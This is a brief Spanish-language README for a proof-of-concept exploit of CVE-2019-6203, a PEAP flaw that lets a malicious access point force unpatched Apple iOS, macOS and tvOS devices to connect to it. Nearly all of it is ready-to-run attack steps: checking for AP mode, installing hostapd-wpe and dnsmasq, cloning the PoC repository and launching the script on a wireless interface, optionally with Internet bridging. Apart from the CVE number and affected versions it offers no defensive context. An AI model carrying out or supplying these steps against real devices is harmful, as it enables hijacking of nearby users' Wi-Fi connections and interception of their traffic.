
PoC para CVE-2019-6203, funciona en < iOS 12.2, macOS < 10.14.4
Hay un fallo de PEAP en todos los dispositivos Apple que permitiría a un atacante forzar a cualquier dispositivo Apple (iOS, macOS o tvOS) a asociarse con un punto de acceso malicioso.
Este es un PoC para CVE-2019-6203, funciona en < iOS 12.2, macOS < 10.14.4, probado en Kali Linux.
Necesitas una tarjeta Wi-Fi que admita modo AP para ejecutar este PoC. Puedes comprobarlo ejecutando iw list, la salida será similar a:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#with Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0
vídeo: https://youtu.be/UEzdtkcnrYw